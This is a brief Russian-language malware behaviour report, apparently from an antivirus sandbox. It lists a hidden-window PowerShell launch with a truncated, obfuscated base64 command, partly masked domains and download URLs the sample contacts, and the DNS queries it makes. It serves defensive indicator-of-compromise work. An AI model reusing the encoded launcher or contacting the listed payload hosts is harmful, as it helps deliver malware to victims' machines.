Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAGcAbABwAG8ANgA3AD0AKAAoACcATgAnACsAJwBsADkAJwApACsAKAAnADkAXwAnACsAJwA4AHQAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABlAG4AdgA6AHUAcwBlAHIAUABSAE8AZgBpAGwAZQBcAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1560
- %TEMP%\846274.cvr
- 'vu###itue.com':80
- 'in####istemas.com':80
- 'hu###omains.com':443
- 'lb####putacion.com':80
- 'lb####putacion.com':443
- 'in###ar2020.com':80
- 'in###ar2020.com':443
- http://vu###itue.com/wp-admin/5EXcy/
- http://in####istemas.com/cgi-bin/goq/
- http://lb####putacion.com/services/7WvvT/
- http://in###ar2020.com/sites/all/modules/contrib/prod_check/0m/
- 'hu###omains.com':443
- 'lb####putacion.com':443
- 'in###ar2020.com':443
- DNS ASK vu###itue.com
- DNS ASK in####istemas.com
- DNS ASK hu###omains.com
- DNS ASK lb####putacion.com
- DNS ASK in###ar2020.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAGcAbABwAG8ANgA3AD0AKAAoACcATgAnACsAJwBsADkAJwApACsAKAAnADkAXwAnACsAJwA4AHQAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABlAG4AdgA6AHUAcwBlAHIAUABSAE8AZgBpAGwAZQBcAG...' (со скрытым окном)